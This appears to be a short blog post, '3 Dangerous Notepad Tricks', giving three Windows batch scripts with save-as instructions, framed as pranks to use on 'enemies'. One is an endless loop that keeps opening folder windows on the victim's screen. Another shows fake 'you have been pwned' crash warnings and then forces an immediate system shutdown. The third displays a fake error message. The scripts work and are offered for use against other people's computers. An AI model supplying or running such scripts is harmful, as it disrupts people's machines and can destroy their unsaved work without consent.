Top 3 Dangerous Notepad Tricks 2014 - You Can Try On Your Enimies



1.Fake File Disturbance

Caution: This create a file that continuously display on your monitor which cannot be minimized, closed, or maximized until the CMD file (Notepad file) is deleted from system.

  • Copy the below code and paste it in Notepad
  
    @echo off
    md hello
    :A
    start hello
    goto A
  • Now save it as file.bat


2.Shut-down Mania :

Caution: This make your enemies that their computer has attacked by virus, and any action they made on it will automatically shut-down the system.

  • Copy the below code and paste it in Notepad

     @echo off
     :A
     cls 
     echo Do you wanna crash your computer? (y/n) 
     pause 
     echo Are you sure? (y/n) 
     pause 
     echo your computer will crash when the time reaches zero. 
     pause 
     msg * Your computer will crash in... 
     msg * 5 
     msg * 4 
     msg * 3 
     msg * 2 
     msg * 1 
     msg * Good-Bye 
     msg * You have been pwned! :) 
    shutdown -s -t 00 
  • Now save it as shutdown.bat 

3.Fake Message:

Caution: This creates "ERROR" message on your computer


  • Copy the below code and paste it in Notepad

          msg * Error: Your Message Her                                                                                                                                                                                        
  • Save as virus.bat
  • Now open that .bat file, now you got error message window.